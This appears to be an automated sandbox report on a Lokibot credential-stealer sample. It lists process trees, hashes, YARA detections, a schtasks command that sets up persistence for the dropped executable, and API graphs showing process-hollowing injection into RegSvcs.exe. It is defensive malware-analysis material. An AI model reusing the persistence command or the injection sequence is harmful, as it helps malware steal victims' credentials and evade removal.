                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:8
                                                                                  Start time:00:52:04
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                  Imagebase:0xe50000
                                                                                  File size:45'984 bytes
                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Loki_1, Description: Loki Payload, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:9
                                                                                  Start time:00:52:05
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
                                                                                  Imagebase:0x310000
                                                                                  File size:630'792 bytes
                                                                                  MD5 hash:17BF29A93776B4F6BE948802F652E6A9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 39%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:10
                                                                                  Start time:00:52:06
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff693ab0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:00:52:12
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp"
                                                                                  Imagebase:0x400000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:12
                                                                                  Start time:00:52:12
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:00:52:13
                                                                                  Start date:04/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8056 -s 1768
                                                                                  Imagebase:0x210000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:10.6%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:42
                                                                                    Total number of Limit Nodes:4
                                                                                    execution_graph 17004 738ab38 17005 738ab78 VirtualAllocEx 17004->17005 17007 738abb5 17005->17007 17008 738a578 17009 738a5b8 ResumeThread 17008->17009 17011 738a5e9 17009->17011 17012 738abf8 17013 738ac40 WriteProcessMemory 17012->17013 17015 738ac97 17013->17015 17036 738a628 17037 738a66d Wow64SetThreadContext 17036->17037 17039 738a6b5 17037->17039 17040 738ace8 17041 738ad33 ReadProcessMemory 17040->17041 17043 738ad77 17041->17043 17048 738f408 17049 738f593 17048->17049 17051 738f42e 17048->17051 17051->17049 17052 738aed4 17051->17052 17053 738f688 PostMessageW 17052->17053 17054 738f6f4 17053->17054 17054->17051 17044 79e698 17045 79e6da 17044->17045 17046 79e6e0 GetModuleHandleW 17044->17046 17045->17046 17047 79e70d 17046->17047 17055 738b280 17056 738b309 CreateProcessA 17055->17056 17058 738b4cb 17056->17058 17016 797870 17017 79787a 17016->17017 17019 797d68 17016->17019 17020 797d6c 17019->17020 17024 797e78 17020->17024 17028 797e67 17020->17028 17025 797e7e 17024->17025 17026 797f7c 17025->17026 17032 797a8c 17025->17032 17026->17026 17030 797e6c 17028->17030 17029 797f7c 17029->17029 17030->17029 17031 797a8c CreateActCtxA 17030->17031 17031->17029 17033 798f08 CreateActCtxA 17032->17033 17035 798fcb 17033->17035

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 628 790f40-790f6b call 7900e4 631 790f70 628->631 632 790f75-790f8a 631->632 633 790f90 632->633 634 7910a4-7910ed call 7900f4 632->634 633->631 633->634 635 791028-79102c 633->635 636 79103f-79104b 633->636 637 790fb1-790fdf 633->637 638 790fe1-790ff1 633->638 639 791081-79108f 633->639 640 791063-79107c 633->640 641 790ff3-791023 633->641 642 791094-79109f 633->642 643 790f97-790faf 633->643 660 7910ef call 791a58 634->660 661 7910ef call 79215f 634->661 662 7910ef call 79211e 634->662 663 7910ef call 791f04 634->663 645 79102e-791033 635->645 646 791035 635->646 653 791053-79105e 636->653 637->632 638->632 639->632 640->632 641->632 642->632 643->632 650 79103a 645->650 646->650 650->632 653->632 659 7910f5-7910fe 660->659 661->659 662->659 663->659
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: R`J$Te^q$Te^q
                                                                                    • API String ID: 0-383871421
                                                                                    • Opcode ID: aafa8e3faadbe450dbe89109e4b99b21990d4b8bd4e4ea8f8948515cb5e2be91
                                                                                    • Instruction ID: ff73707e045920c53585ad4fcb75665c479577d1f207809eea4a1b07a35b38a9
                                                                                    • Opcode Fuzzy Hash: aafa8e3faadbe450dbe89109e4b99b21990d4b8bd4e4ea8f8948515cb5e2be91
                                                                                    • Instruction Fuzzy Hash: 6641A371B10116CFDB04CFA9D98567EBBB6FF88700F20842AE505EB361CB799E058B91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758693923.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ae0000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: JSP
                                                                                    • API String ID: 0-2020610652
                                                                                    • Opcode ID: 578e8e77cc2aeaf2ab099c68b659fa5254b3c65d56798831883569e3a4074970
                                                                                    • Instruction ID: b6e86486eb663f167788181bf3f9904aa24c63c3dc534d7ab250b7cd5e2fc8b4
                                                                                    • Opcode Fuzzy Hash: 578e8e77cc2aeaf2ab099c68b659fa5254b3c65d56798831883569e3a4074970
                                                                                    • Instruction Fuzzy Hash: C5C1ABB17017068FEB29EB75C560B6FB7EAAFC9300F64446DD15A8B291DB78D802CB11
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a90f019796e5ae428cd918fe852b5f006761fc0ca75fd64cf4edddf46d7855f8
                                                                                    • Instruction ID: a69ba6e6b2be1f54ddf62856c129c49cbc3eb8179336d29a4817f82e5f9a1eb6
                                                                                    • Opcode Fuzzy Hash: a90f019796e5ae428cd918fe852b5f006761fc0ca75fd64cf4edddf46d7855f8
                                                                                    • Instruction Fuzzy Hash: 7971F571704201DFCB84DF28E5809297BA5AF95300BA28566D806EF263D73CED42DB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f701abd5945cb08a952712d41e15767a2a8195e22cc9cbaff2d329f09774dab6
                                                                                    • Instruction ID: b4d02f5f587ebda60755589d2af5b210cedfac5cdb523f868e8e3e626f8207a8
                                                                                    • Opcode Fuzzy Hash: f701abd5945cb08a952712d41e15767a2a8195e22cc9cbaff2d329f09774dab6
                                                                                    • Instruction Fuzzy Hash: AC4115F4D1A30ADFEB44EFAAE5443EDFBBDAF8A300F14A02AD409A2251D7385445CB40
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738B4B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 0ce000971ae79d2e3927e740a37447f6d1d50a2474921baded6ceb386e3dbeec
                                                                                    • Instruction ID: b4f705cfd43b8e5814b28dc4ac5a8d83083ef5f6d3a233fcd8535b2588ec0b8c
                                                                                    • Opcode Fuzzy Hash: 0ce000971ae79d2e3927e740a37447f6d1d50a2474921baded6ceb386e3dbeec
                                                                                    • Instruction Fuzzy Hash: EBA14BB1D0031ADFEB54DF68C8417AEFBB2AF48310F1485AAE848A7250D7759985CF92
                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0738B4B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 308ab823071658de16fdf76914e60cf7400f59babed102977c1295811b8f6fd5
                                                                                    • Instruction ID: 5ee3cc88f2add57a49a3c097795bc137b905280d2a697b414c9844725197d709
                                                                                    • Opcode Fuzzy Hash: 308ab823071658de16fdf76914e60cf7400f59babed102977c1295811b8f6fd5
                                                                                    • Instruction Fuzzy Hash: D79149F1D0031ACFEB50DF68C84179EFBB2AF48314F1485AAE858A7250DB759985CF92
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00798FB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: f084f68a8d36398f603a87c43d923a725314ec446706539547ed38ee5d89c054
                                                                                    • Instruction ID: 73936b2c677cf86594f33baf6b945ad472c79b959b35a8422f4decbe7856c177
                                                                                    • Opcode Fuzzy Hash: f084f68a8d36398f603a87c43d923a725314ec446706539547ed38ee5d89c054
                                                                                    • Instruction Fuzzy Hash: 3A4102B0C00719CEDF24CFA9D844BDEBBB6BF49304F20806AE508AB255DB766945CF91
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 0738F6E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 69e2f5aacf3c5123cffa673c64a3cdd3911310a28eb12fa0502cf4927dc75e66
                                                                                    • Instruction ID: 5fcb22699641fc55d91c626bcc1394414b315ae6fe54f68b892713abc82a57b6
                                                                                    • Opcode Fuzzy Hash: 69e2f5aacf3c5123cffa673c64a3cdd3911310a28eb12fa0502cf4927dc75e66
                                                                                    • Instruction Fuzzy Hash: 584123B580034A9FDB20EF9AC449BDEFBF8EB48324F20855AD559A7210D374A544CFA5
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00798FB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1753431693.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_790000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 523ce52dc85bab558276b606a47d7f1fab3030777b508e36062ae2ee53e5ec06
                                                                                    • Instruction ID: 315572d3c1588ca52c56cfdeb5ce17c36e3bf07f637ce909d126972d5c553e68
                                                                                    • Opcode Fuzzy Hash: 523ce52dc85bab558276b606a47d7f1fab3030777b508e36062ae2ee53e5ec06
                                                                                    • Instruction Fuzzy Hash: B541F0B0C00719DFDF24CFA9C844B9EBBB6BF49304F20806AE408AB255DB756945CF91
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0738AC88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 3d374a19c7b444ed92d39747bf4947d6edcffdaa8c6e33eabcd30c9585f16e03
                                                                                    • Instruction ID: 61b0c884e0a5d65f29a8667c7ab0b5b1028318ee5417daf72d99399b2780efe0
                                                                                    • Opcode Fuzzy Hash: 3d374a19c7b444ed92d39747bf4947d6edcffdaa8c6e33eabcd30c9585f16e03
                                                                                    • Instruction Fuzzy Hash: 3B2153B19003599FDB10DFA9C881BEEBBF0FF88310F10842AE958A7350C7789944CBA4
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0738AC88
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: f48ef9bc1c0184d1d7f647222800b6767637232e4fd072ebe60b056b013b67cb
                                                                                    • Instruction ID: f61916ab0be1383af86eb15324999d58f5a9b1856cd40575046d67d60505734b
                                                                                    • Opcode Fuzzy Hash: f48ef9bc1c0184d1d7f647222800b6767637232e4fd072ebe60b056b013b67cb
                                                                                    • Instruction Fuzzy Hash: 5E2155B19003599FDB10DFA9C880BDEBBF5FF48310F10842AE958A7340D7789954CBA5
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0738A6A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: ba4669381df35eb7af0b90a16b86371fd3376b4a8d110217648f4358f98f3ef2
                                                                                    • Instruction ID: 4e9c67ccda7d75445a3c1c68b437e706dd0a7120b408e954e3517cb22faf4b99
                                                                                    • Opcode Fuzzy Hash: ba4669381df35eb7af0b90a16b86371fd3376b4a8d110217648f4358f98f3ef2
                                                                                    • Instruction Fuzzy Hash: 892134B19003098FDB10DFA9C4857EEBBF4AF88324F10842ED459A7240C7789945CFA5
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0738AD68
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 16933d4964f4f94f9cdcecf87da6523b193eed127f016f2b30306a223a57cb94
                                                                                    • Instruction ID: 2b02258ff1ddbe174ec24f071de702987194a98ff992e968a498f082b347b65f
                                                                                    • Opcode Fuzzy Hash: 16933d4964f4f94f9cdcecf87da6523b193eed127f016f2b30306a223a57cb94
                                                                                    • Instruction Fuzzy Hash: 162136B29003599FCB10DFA9C880AEEBBF5FF48310F10842EE559A7250C7389545CBA5
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0738A6A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 468df9b880bb12519ec151c5a968849e76c18b85d165ccf1652d5ecbf1051042
                                                                                    • Instruction ID: 7a1f091eb7000a1797b9f499764e97d2662d9ef69c89b6ecaa1d44b21e03acf9
                                                                                    • Opcode Fuzzy Hash: 468df9b880bb12519ec151c5a968849e76c18b85d165ccf1652d5ecbf1051042
                                                                                    • Instruction Fuzzy Hash: 8E2138B19003098FDB10DFAAC4857EEBBF4EF88324F10C42AD459A7240D778A944CFA5
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0738AD68
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 48f28834a4520c176589c3e4786afcef9bf24ebb91454a7ebce423b6d5912ef0
                                                                                    • Instruction ID: 197f8ac26e5ba4856abdfd7784bc835d0db319c3cd3ed7d3d85f755719efa075
                                                                                    • Opcode Fuzzy Hash: 48f28834a4520c176589c3e4786afcef9bf24ebb91454a7ebce423b6d5912ef0
                                                                                    • Instruction Fuzzy Hash: A32137B19003599FDB10DFAAC880BEEFBF5FF48320F10842AE558A7250D7389944CBA5
                                                                                    APIs
                                                                                    • ResumeThread.KERNELBASE(?), ref: 0738A5DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 340de986222d7f062e8ea5b8c4beaa6f74477805a99227aa194e5fcca863c58d
                                                                                    • Instruction ID: 66d2aa867137a1a5d121affd4cda86c62477b8e236af580588b17ba36fe0286b
                                                                                    • Opcode Fuzzy Hash: 340de986222d7f062e8ea5b8c4beaa6f74477805a99227aa194e5fcca863c58d
                                                                                    • Instruction Fuzzy Hash: D61147B5D00249CFDB20DFA9C4457EEFBF4EB88314F24842AD459A7210D739A944CF95
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0738ABA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 4895e20e0c4245d2ee3696eabd262e0b094baf1f02288034cecdb498b76bb648
                                                                                    • Instruction ID: bd1a16e7c073827e4a72e440e8c455041df32bbfbb9b6d390e0954555968cdfa
                                                                                    • Opcode Fuzzy Hash: 4895e20e0c4245d2ee3696eabd262e0b094baf1f02288034cecdb498b76bb648
                                                                                    • Instruction Fuzzy Hash: 031159B59002499FDB10DFA9C845BEEBFF5EF88320F20841AD559A7250C7359944CF91
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0738ABA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 82585647a9c5500dc7a97c8bc861461a05ab143435f5c75140dabe19f9f1daa7
                                                                                    • Instruction ID: 14326712105ebbb5a86906eed57fd4f8c894904c668572596b52974dff324da6
                                                                                    • Opcode Fuzzy Hash: 82585647a9c5500dc7a97c8bc861461a05ab143435f5c75140dabe19f9f1daa7
                                                                                    • Instruction Fuzzy Hash: B91167B19002499FCB10DFAAC844BDEBFF5EF88320F20881AE559A7250C735A944CFA5
                                                                                    APIs
                                                                                    • ResumeThread.KERNELBASE(?), ref: 0738A5DA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1758558662.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7380000_CLOSURE DATE FOR THE YEAR.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: b1d23e64ca808fc0535582e928a762a78af56a357bcac32982ed4c6387d1359b
                                                                                    • Instruction ID: bf40c96434d4ad93f8e940d6461b31588a49c1ddd2cf79dd19c7106e554a7197
                                                                                    • Opcode Fuzzy Hash: b1d23e64ca808fc0535582e928a762a78af56a357bcac32982ed4c6387d1359b
                                                                                    • Instruction Fuzzy Hash: EA116AB19003498FDB20DFAAC4447DEFBF4EB88324F20842AC459A7240CB38A584CF95
